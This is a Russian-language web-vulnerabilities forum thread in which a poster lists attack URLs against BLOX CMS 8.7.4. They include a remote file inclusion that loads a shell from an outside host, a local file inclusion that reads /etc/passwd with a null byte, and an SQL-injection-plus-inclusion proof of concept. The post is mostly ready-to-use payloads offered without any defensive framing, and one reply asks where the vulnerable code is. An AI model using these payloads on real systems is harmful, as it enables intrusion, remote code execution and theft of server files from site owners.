BLOX CMS

Discussion in 'Веб-уязвимости' started by [Dark Green], 10 Jan 2011.

  1. [Dark Green]

    [Dark Green] Banned

    Joined:
    13 May 2010
    Messages:
    188
    Likes Received:
    430
    Reputations:
    567
    Офф. сайт: Blox.ru | Информация о CMS
    Текущая версия: 8.7.4 настолько дырявая, что на раскрутку всех багов уйдет вечность :D Поэтому я ограничелся несколькими критическими уязвимостями =)

    [PHP-Include REMOTE]
    BLOX\functions\go.php[8]
    register_globals=ON
    Code:
    http://blox/BLOX/go.php?dbhost=localhost&dbuser=root&dbpass=&dbname=blox&prefix=1&bloxDir=http://site.ru/shell.txt?
    [PHP-Include LOCAL]
    BLOX\functions\go.php[18], BLOX\functions\getPageParams.php[3]
    register_globals=ON
    Code:
    http://blox/?cmsLanguage=russian/../../../../etc/passwd%00
    POC [PHP-Include with SQL Injection]
    BLOX\functions\go.php[29, 119-142]
    Ошибка в синтаксисе SQL запроса в скрипте, пока косяк в коде не поправят - работать не будет.
    Code:
    http://blox/?PQ=1&1'UNION(SELECT(1),2,CONCAT('../../../../../../../../../../ect/passwd',0x00))/*
    Скачать исходник: http://blox.ru/?download&file=BLOX.8.7.4.zip
     
    #1 [Dark Green], 10 Jan 2011
    Last edited: 4 Aug 2011
    3 people like this.
  2. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    Йопт, а где уязвимый код???!